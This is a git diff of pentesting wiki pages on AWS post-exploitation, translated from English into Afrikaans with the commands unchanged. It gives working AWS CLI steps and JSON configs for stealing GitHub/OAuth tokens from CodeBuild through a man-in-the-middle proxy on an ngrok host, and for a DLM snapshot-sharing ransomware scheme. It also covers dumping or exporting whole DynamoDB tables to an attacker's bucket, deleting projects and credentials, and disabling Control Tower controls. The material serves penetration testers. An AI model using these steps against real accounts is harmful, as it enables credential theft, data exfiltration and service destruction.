-And **change the Buildspec commands to exfiltrate each repo**. +En **verander die Buildspec-opdragte om elke repo te exfiltreer**. > [!WARNING] -> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ -> Or does he? Check the next section +> egter, hierdie **taak is herhalend en vervelig** en as 'n github-token met **skryfregte** geconfigureer is, sal 'n aanvaller **nie in staat wees om (mis)bruik te maak van daardie regte** nie, aangesien hy nie toegang het tot die token.\ +> Of het hy? Kyk na die volgende afdeling -### Leaking Access Tokens from AWS CodeBuild - -You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: +### Lek van Toegangstokens van AWS CodeBuild +Jy kan toegang lek wat in CodeBuild aan platforms soos Github gegee is. Kyk of enige toegang tot eksterne platforms gegee is met: ```bash aws codebuild list-source-credentials ``` - {{#ref}} aws-codebuild-token-leakage.md {{#endref}} ### `codebuild:DeleteProject` -An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. - +'n Aanvaller kan 'n hele CodeBuild-projek verwyder, wat tot verlies van projekkonfigurasie lei en toepassings wat op die projek staatmaak, beïnvloed. ```bash aws codebuild delete-project --name ``` - -**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. +**Potensiële Impak**: Verlies van projekkonfigurasie en diensonderbreking vir toepassings wat die verwyderde projek gebruik. ### `codebuild:TagResource` , `codebuild:UntagResource` -An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. 
- +'n Aanvaller kan etikette byvoeg, wysig of verwyder van CodeBuild hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing en toegangbeheerbeleide gebaseer op etikette ontwrig. ```bash aws codebuild tag-resource --resource-arn --tags aws codebuild untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**Potensiële Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide. ### `codebuild:DeleteSourceCredentials` -An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. - +'n Aanvaller kan bronbewyse vir 'n Git-repositori verwyder, wat die normale funksionering van toepassings wat op die repositori staatmaak, beïnvloed. ```sql aws codebuild delete-source-credentials --arn ``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. +**Potensiële Impak**: Ontwrichting van normale funksionering vir toepassings wat op die betrokke repo staatmaak as gevolg van die verwydering van bronbewyse. {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md index c514d7a7c..4a5619724 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md 
@@ -2,73 +2,68 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Recover Github/Bitbucket Configured Tokens - -First, check if there are any source credentials configured that you could leak: +## Herwin Github/Bitbucket Geconfigureerde Tokens +Eerst, kyk of daar enige bronakkrediteure geconfigureer is wat jy kan lek: ```bash aws codebuild list-source-credentials ``` - ### Via Docker Image -If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. +As jy vind dat outentisering na byvoorbeeld Github in die rekening ingestel is, kan jy **exfiltrate** daardie **toegang** (**GH token of OAuth token**) deur Codebuild te laat **gebruik 'n spesifieke docker image** om die bou van die projek te loop. -For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. +Vir hierdie doel kan jy **'n nuwe Codebuild projek skep** of die **omgewing** van 'n bestaande een verander om die **Docker image** in te stel. -The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. +Die Docker image wat jy kan gebruik is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). Dit is 'n baie basiese Docker image wat die **env veranderlikes `https_proxy`**, **`http_proxy`** en **`SSL_CERT_FILE`** sal stel. 
Dit sal jou toelaat om die meeste van die verkeer van die gasheer wat in **`https_proxy`** en **`http_proxy`** aangedui is, te onderskep en die SSL CERT wat in **`SSL_CERT_FILE`** aangedui is, te vertrou. -1. **Create & Upload your own Docker MitM image** - - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. - - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. - - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host - - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** - - Create a **new Codebuild project** or **modify** the environment of an existing one. - - Set the project to use the **previously generated Docker image** +1. **Skep & Laai jou eie Docker MitM image op** +- Volg die instruksies van die repo om jou proxy IP adres in te stel en jou SSL sertifikaat in te stel en **bou die docker image**. +- **MOENIE `http_proxy` INSTEL NIE** om nie versoeke na die metadata eindpunt te onderskep nie. +- Jy kan **`ngrok`** gebruik soos `ngrok tcp 4444` om die proxy na jou gasheer in te stel. +- Sodra jy die Docker image gebou het, **laai dit op na 'n openbare repo** (Dockerhub, ECR...) +2. **Stel die omgewing in** +- Skep 'n **nuwe Codebuild projek** of **wysig** die omgewing van 'n bestaande een. +- Stel die projek in om die **voorheen gegenereerde Docker image** te gebruik.
-3. **Set the MitM proxy in your host** - -- As indicated in the **Github repo** you could use something like: +3. **Stel die MitM proxy in jou gasheer in** +- Soos aangedui in die **Github repo** kan jy iets soos gebruik: ```bash mitmproxy --listen-port 4444 --allow-hosts "github.com" ``` - > [!TIP] -> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. +> Die **mitmproxy weergawe wat gebruik is, was 9.0.1**, daar is gerapporteer dat dit met weergawe 10 dalk nie sal werk nie. -4. **Run the build & capture the credentials** +4. **Voer die bou uit & vang die geloofsbriewe** -- You can see the token in the **Authorization** header: +- Jy kan die token in die **Authorization** koptekst sien: -
- -This could also be done from the aws cli with something like +
+Dit kan ook vanaf die aws cli gedoen word met iets soos ```bash # Create project using a Github connection aws codebuild create-project --cli-input-json file:///tmp/buildspec.json ## With /tmp/buildspec.json { - "name": "my-demo-project", - "source": { - "type": "GITHUB", - "location": "https://github.com/uname/repo", - "buildspec": "buildspec.yml" - }, - "artifacts": { - "type": "NO_ARTIFACTS" - }, - "environment": { - "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM - "image": "docker.io/carlospolop/docker-mitm:v12", - "computeType": "BUILD_GENERAL1_SMALL", - "imagePullCredentialsType": "CODEBUILD" - } +"name": "my-demo-project", +"source": { +"type": "GITHUB", +"location": "https://github.com/uname/repo", +"buildspec": "buildspec.yml" +}, +"artifacts": { +"type": "NO_ARTIFACTS" +}, +"environment": { +"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM +"image": "docker.io/carlospolop/docker-mitm:v12", +"computeType": "BUILD_GENERAL1_SMALL", +"imagePullCredentialsType": "CODEBUILD" +} } ## Json 
@@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json # Start the build aws codebuild start-build --project-name my-project2 ``` - ### Via insecureSSL -**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ -Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. - -- First you need to enumerate the current configuration with something like: +**Codebuild** projekte het 'n instelling genaamd **`insecureSsl`** wat in die web versteek is en jy kan dit slegs vanaf die API verander.\ +Deur dit in te skakel, kan Codebuild met die repository verbind **sonder om die sertifikaat** wat deur die platform aangebied word, te kontroleer. +- Eerstens moet jy die huidige konfigurasie opnoem met iets soos: ```bash aws codebuild batch-get-projects --name ``` - -- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). - - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like: - +- Dan, met die ingesamelde inligting kan jy die projekinstelling **`insecureSsl`** op **`True`** opdateer. Die volgende is 'n voorbeeld van my opdatering van 'n projek, let op die **`insecureSsl=True`** aan die einde (dit is die enigste ding wat jy moet verander van die ingesamelde konfigurasie). 
+- Boonop, voeg ook die omgewing veranderlikes **http_proxy** en **https_proxy** by wat na jou tcp ngrok wys soos: ```bash aws codebuild update-project --name \ - --source '{ - "type": "GITHUB", - "location": "https://github.com/carlospolop/404checker", - "gitCloneDepth": 1, - "gitSubmodulesConfig": { - "fetchSubmodules": false - }, - "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", - "auth": { - "type": "CODECONNECTIONS", - "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" - }, - "reportBuildStatus": false, - "insecureSsl": true - }' \ - --environment '{ - "type": "LINUX_CONTAINER", - "image": "aws/codebuild/standard:5.0", - "computeType": "BUILD_GENERAL1_SMALL", - "environmentVariables": [ - { - "name": "http_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - }, - { - "name": "https_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - } - ] - }' +--source '{ +"type": "GITHUB", +"location": "https://github.com/carlospolop/404checker", +"gitCloneDepth": 1, +"gitSubmodulesConfig": { +"fetchSubmodules": false +}, +"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", +"auth": { +"type": "CODECONNECTIONS", +"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" +}, +"reportBuildStatus": false, +"insecureSsl": true +}' \ +--environment '{ +"type": "LINUX_CONTAINER", +"image": "aws/codebuild/standard:5.0", +"computeType": "BUILD_GENERAL1_SMALL", +"environmentVariables": [ +{ +"name": "http_proxy", +"value": "http://2.tcp.eu.ngrok.io:15027" +}, +{ +"name": "https_proxy", +"value": "http://2.tcp.eu.ngrok.io:15027" +} +] +}' ``` - -- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) - +- Dan, voer die basiese voorbeeld van 
[https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) uit in die poort aangedui deur die proxy veranderlikes (http_proxy en https_proxy) ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( - host="127.0.0.1", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() +host="127.0.0.1", +port=4444, +protocols=[protocol.HTTP], +middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. +certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` - -- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: +- Laastens, klik op **Bou die projek**, die **bewyse** sal in **duidelike teks** (base64) na die mitm-poort gestuur word:
-### ~~Via HTTP protocol~~ +### ~~Via HTTP-protokol~~ -> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** +> [!TIP] > **Hierdie kwesbaarheid is op 'n stadium in die week van die 20ste Februarie 2023 deur AWS reggestel (ek dink op Vrydag). So 'n aanvaller kan dit nie meer misbruik nie :)** -An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. +'n Aanvaller met **verhoogde regte in 'n CodeBuild kan die Github/Bitbucket-token** wat geconfigureer is, lek of as regte via OAuth geconfigureer is, die **tydelike OAuth-token wat gebruik word om toegang tot die kode te verkry**. -- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). +- 'n Aanvaller kan die omgewingsveranderlikes **http_proxy** en **https_proxy** aan die CodeBuild-projek voeg wat na sy masjien wys (byvoorbeeld `http://5.tcp.eu.ngrok.io:14972`).
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` -- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) - +- Verander dan die URL van die github-repo om HTTP in plaas van HTTPS te gebruik, byvoorbeeld: `http://github.com/carlospolop-forks/TestActions` +- Voer dan die basiese voorbeeld van [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) uit in die poort wat deur die proxy-veranderlikes (http_proxy en https_proxy) aangedui word. ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( - host="0.0.0.0", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() +host="0.0.0.0", +port=4444, +protocols=[protocol.HTTP], +middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. +certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` - -- Next, click on **Build the project** or start the build from command line: - +- Volgende, klik op **Bou die projek** of begin die bou vanaf die opdraglyn: ```sh aws codebuild start-build --project-name ``` - -- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: +- Uiteindelik sal die **credentials** in **duidelike teks** (base64) na die mitm-poort gestuur word:
> [!WARNING] -> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. +> Nou sal 'n aanvaller in staat wees om die token van sy masjien te gebruik, al die regte wat dit het op te lys en (mis)bruik makliker as om die CodeBuild-diens direk te gebruik. {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md index f1c6fb394..374c51179 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md @@ -8,17 +8,11 @@ ../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md {{#endref}} -### Enable / Disable Controls - -To further exploit an account, you might need to disable/enable Control Tower controls: +### Aktiveer / Deaktiveer Beheer +Om 'n rekening verder te benut, mag jy nodig hĂȘ om Control Tower-beheer te deaktiveer/aktiver: ```bash aws controltower disable-control --control-identifier --target-identifier aws controltower enable-control --control-identifier --target-identifier ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md index baa309e53..199bc31e4 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md 
@@ -6,94 +6,86 @@ ### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy` -A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot. +'n Ransomware-aanval kan uitgevoer word deur soveel EBS-volumes as moontlik te enkripteer en dan die huidige EC2-instances, EBS-volumes en snapshots te verwyder. Om hierdie kwaadwillige aktiwiteit te outomatiseer, kan 'n mens Amazon DLM gebruik, die snapshots te enkripteer met 'n KMS-sleutel van 'n ander AWS-rekening en die geĂ«nkripteerde snapshots na 'n ander rekening oor te dra. Alternatiewelik kan hulle snapshots sonder enkripsie na 'n rekening wat hulle bestuur oorplaas en dit dan daar enkripteer. Alhoewel dit nie reguit is om bestaande EBS-volumes of snapshots direk te enkripteer nie, is dit moontlik om dit te doen deur 'n nuwe volume of snapshot te skep. -Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type. +Eerstens sal 'n mens 'n opdrag gebruik om inligting oor volumes te versamel, soos instance ID, volume ID, enkripsiestatus, aanhegselsstatus, en volumetipe. `aws ec2 describe-volumes` -Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. 
The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs. - +Tweedens sal 'n mens die lewensiklusbeleid skep. Hierdie opdrag gebruik die DLM API om 'n lewensiklusbeleid op te stel wat outomaties daaglikse snapshots van spesifieke volumes op 'n aangewese tyd neem. Dit pas ook spesifieke etikette op die snapshots toe en kopieer etikette van die volumes na die snapshots. Die policyDetails.json-lĂȘer sluit die besonderhede van die lewensiklusbeleid in, soos teiketikette, skedule, die ARN van die opsionele KMS-sleutel vir enkripsie, en die teikrekening vir snapshotdeling, wat in die slagoffer se CloudTrail-logs aangeteken sal word. ```bash aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json ``` - -A template for the policy document can be seen here: - +'n Sjabloon vir die beleidsdokument kan hier gesien word: ```bash { - "PolicyType": "EBS_SNAPSHOT_MANAGEMENT", - "ResourceTypes": [ - "VOLUME" - ], - "TargetTags": [ - { - "Key": "ExampleKey", - "Value": "ExampleValue" - } - ], - "Schedules": [ - { - "Name": "DailySnapshots", - "CopyTags": true, - "TagsToAdd": [ - { - "Key": "SnapshotCreator", - "Value": "DLM" - } - ], - "VariableTags": [ - { - "Key": "CostCenter", - "Value": "Finance" - } - ], - "CreateRule": { - "Interval": 24, - "IntervalUnit": "HOURS", - "Times": [ - "03:00" - ] - }, - "RetainRule": { - "Count": 14 - }, - "FastRestoreRule": { - "Count": 2, - "Interval": 12, - "IntervalUnit": "HOURS" - }, - "CrossRegionCopyRules": [ - { - "TargetRegion": "us-west-2", - "Encrypted": true, - "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id", - "CopyTags": true, - "RetainRule": { - "Interval": 1, - 
"IntervalUnit": "DAYS" - } - } - ], - "ShareRules": [ - { - "TargetAccounts": [ - "123456789012" - ], - "UnshareInterval": 30, - "UnshareIntervalUnit": "DAYS" - } - ] - } - ], - "Parameters": { - "ExcludeBootVolume": false - } +"PolicyType": "EBS_SNAPSHOT_MANAGEMENT", +"ResourceTypes": [ +"VOLUME" +], +"TargetTags": [ +{ +"Key": "ExampleKey", +"Value": "ExampleValue" +} +], +"Schedules": [ +{ +"Name": "DailySnapshots", +"CopyTags": true, +"TagsToAdd": [ +{ +"Key": "SnapshotCreator", +"Value": "DLM" +} +], +"VariableTags": [ +{ +"Key": "CostCenter", +"Value": "Finance" +} +], +"CreateRule": { +"Interval": 24, +"IntervalUnit": "HOURS", +"Times": [ +"03:00" +] +}, +"RetainRule": { +"Count": 14 +}, +"FastRestoreRule": { +"Count": 2, +"Interval": 12, +"IntervalUnit": "HOURS" +}, +"CrossRegionCopyRules": [ +{ +"TargetRegion": "us-west-2", +"Encrypted": true, +"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id", +"CopyTags": true, +"RetainRule": { +"Interval": 1, +"IntervalUnit": "DAYS" +} +} +], +"ShareRules": [ +{ +"TargetAccounts": [ +"123456789012" +], +"UnshareInterval": 30, +"UnshareIntervalUnit": "DAYS" +} +] +} +], +"Parameters": { +"ExcludeBootVolume": false +} } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md index d63689d9e..ac5655aa9 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -4,7 +4,7 @@ ## DynamoDB -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-dynamodb-enum.md 
@@ -12,342 +12,292 @@ For more information check: ### `dynamodb:BatchGetItem` -An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`). +'n Aanvaller met hierdie toestemmings sal in staat wees om **items uit tabelle te kry deur die primĂȘre sleutel** (jy kan nie net vir al die data van die tabel vra nie). Dit beteken dat jy die primĂȘre sleutels moet ken (jy kan dit kry deur die tabel metadata te verkry (`describe-table`). {{#tabs }} {{#tab name="json file" }} - ```bash aws dynamodb batch-get-item --request-items file:///tmp/a.json // With a.json { - "ProductCatalog" : { // This is the table name - "Keys": [ - { - "Id" : { // Primary keys name - "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those - } - } - ] - } +"ProductCatalog" : { // This is the table name +"Keys": [ +{ +"Id" : { // Primary keys name +"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those +} +} +] +} } ``` - {{#endtab }} {{#tab name="inline" }} - ```bash aws dynamodb batch-get-item \ - --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ - --region +--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer ### `dynamodb:GetItem` -**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve: - +**Soortgelyk aan die vorige toestemmings** laat hierdie een 'n potensiĂ«le aanvaller toe om waardes van net 1 tabel te lees 
gegewe die primĂȘre sleutel van die inskrywing om te verkry: ```json aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json // With a.json { "Id" : { - "N": "205" +"N": "205" } } ``` - -With this permission it's also possible to use the **`transact-get-items`** method like: - +Met hierdie toestemming is dit ook moontlik om die **`transact-get-items`** metode te gebruik soos: ```json aws dynamodb transact-get-items \ - --transact-items file:///tmp/a.json +--transact-items file:///tmp/a.json // With a.json [ - { - "Get": { - "Key": { - "Id": {"N": "205"} - }, - "TableName": "ProductCatalog" - } - } +{ +"Get": { +"Key": { +"Id": {"N": "205"} +}, +"TableName": "ProductCatalog" +} +} ] ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer ### `dynamodb:Query` -**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request. +**Soos die vorige toestemmings** laat hierdie een 'n potensiĂ«le aanvaller toe om waardes van net 1 tabel te lees gegewe die primĂȘre sleutel van die inskrywing om te verkry. Dit laat toe om 'n [substel van vergelykings](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) te gebruik, maar die enigste vergelyking wat toegelaat word met die primĂȘre sleutel (wat moet verskyn) is "EQ", so jy kan nie 'n vergelyking gebruik om die hele DB in 'n versoek te verkry nie. 
{{#tabs }} {{#tab name="json file" }} - ```bash aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json - // With a.json - { +// With a.json +{ "Id" : { - "ComparisonOperator":"EQ", - "AttributeValueList": [ {"N": "205"} ] - } +"ComparisonOperator":"EQ", +"AttributeValueList": [ {"N": "205"} ] +} } ``` - {{#endtab }} {{#tab name="inline" }} - ```bash aws dynamodb query \ - --table-name TargetTable \ - --key-condition-expression "AttributeName = :value" \ - --expression-attribute-values '{":value":{"S":"TargetValue"}}' \ - --region +--table-name TargetTable \ +--key-condition-expression "AttributeName = :value" \ +--expression-attribute-values '{":value":{"S":"TargetValue"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer ### `dynamodb:Scan` -You can use this permission to **dump the entire table easily**. - +Jy kan hierdie toestemming gebruik om **die hele tabel maklik te dump**. ```bash aws dynamodb scan --table-name #Get data inside the table ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer ### `dynamodb:PartiQLSelect` -You can use this permission to **dump the entire table easily**. - +Jy kan hierdie toestemming gebruik om **die hele tabel maklik te dump**. 
```bash aws dynamodb execute-statement \ - --statement "SELECT * FROM ProductCatalog" +--statement "SELECT * FROM ProductCatalog" ``` - -This permission also allow to perform `batch-execute-statement` like: - +Hierdie toestemming laat ook toe om `batch-execute-statement` uit te voer soos: ```bash aws dynamodb batch-execute-statement \ - --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]' +--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]' ``` +maar jy moet die primĂȘre sleutel met 'n waarde spesifiseer, so dit is nie so nuttig nie. -but you need to specify the primary key with a value, so it isn't that useful. - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer ### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)` -This permission will allow an attacker to **export the whole table to a S3 bucket** of his election: - +Hierdie toestemming sal 'n aanvaller toelaat om die **hele tabel na 'n S3-bucket** van sy keuse te **eksporteer:** ```bash aws dynamodb export-table-to-point-in-time \ - --table-arn arn:aws:dynamodb:::table/TargetTable \ - --s3-bucket \ - --s3-prefix \ - --export-time \ - --region +--table-arn arn:aws:dynamodb:::table/TargetTable \ +--s3-bucket \ +--s3-prefix \ +--export-time \ +--region ``` - -Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with: - +Let wel, vir dit om te werk moet die tabel punt-in-tyd-herstel geaktiveer wees, jy kan nagaan of die tabel dit het met: ```bash aws dynamodb describe-continuous-backups \ - --table-name +--table-name ``` - -If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission: - +As dit nie geaktiveer is nie, sal jy dit moet **aktiveer** en daarvoor het jy die 
**`dynamodb:ExportTableToPointInTime`** toestemming nodig: ```bash aws dynamodb update-continuous-backups \ - --table-name \ - --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true +--table-name \ +--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer ### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)` -With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table. - +Met hierdie toestemmings sou 'n aanvaller in staat wees om **nuwe tabel uit 'n rugsteun te skep** (of selfs 'n rugsteun te skep om dit dan in 'n ander tabel te herstel). Dan, met die nodige toestemmings, sou hy in staat wees om **inligting** van die rugsteun te kontroleer wat **nie meer in die produksie** tabel kon wees nie. ```bash aws dynamodb restore-table-from-backup \ - --backup-arn \ - --target-table-name \ - --region +--backup-arn \ +--target-table-name \ +--region ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table backup +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die tabel rugsteun te lokaliseer ### `dynamodb:PutItem` -This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**. 
